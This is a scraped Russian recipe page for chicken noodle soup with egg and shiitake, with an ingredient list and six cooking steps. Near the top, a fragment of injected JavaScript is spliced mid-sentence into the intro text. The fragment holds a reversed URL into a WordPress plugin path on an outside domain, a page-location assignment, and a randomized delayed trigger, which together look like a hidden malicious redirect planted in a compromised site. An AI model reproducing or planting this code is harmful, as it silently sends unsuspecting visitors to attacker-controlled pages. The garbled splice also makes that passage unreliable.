Рецепт дня: суп с лапшой, курицей и яйцом

fitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-nyashka.ru и международная Группа компаний Mareven с брендом «Роллтон» делятся рецептами вкусных блюд с лапшой, которые легко приготовить на обед или ужин. Горячий суп согреет в дни, когда на улице стоит прохладная погода.

510 calories

Суп с лапшой, курицей и яйцом

Горячий суп согреет в холодное время года и насытит организм качественным белком. 

Изображение рецепта Суп с лапшой, курицей и яйцом

Суп с лапшой, курицей и яйцом

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

25 минут

КОЛИЧЕСТВО ПОРЦИЙ:

3 порции

КАЛОРИЙНОСТЬ:

510 ккал

Сложность

Время

25 минут

Кол-во порций

3 порции

Калорийность

510 ккал

Ингредиенты

Лапша

300 г

Яйца

2 шт.

Курица (филе грудки)

200 г

Грибы (шиитаке)

100 г

Лук (зелёный)

1/2 пучка

Соус (соевый)

3 ст. л.

Бульон (куриный)

4 стакана

Имбирь (измельчённый)

2 ст. л.

Чеснок

2 зубчика

Масло (растительное)

1 ст. л.

Процесс приготовления

  1. Отварите яйца.
  2. Куриную грудку отварите до готовности.
  3. В другой кастрюле разогрейте масло, добавьте чеснок и имбирь и обжаривайте до тех пор, пока не появится аромат.
  4. Влейте в кастрюлю куриный бульон, соевый соус, добавьте грибы, зелёный лук и кусочки готовой курицы.
  5. Перемешайте, подержите на огне 2-3 минуты, пока лапша не приготовится.
  6. Подавайте суп горячим и украшенным половинками яиц.

Больше рецептов!

Статьи по теме

Рецепт дня: боул с лапшой, тофу и овощами

Самый полный гид по лапше: что нужно знать и что из неё приготовить

Рецепт дня: классический пад тай

9 сытных осенних блюд: что приготовить на обед или ужин

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector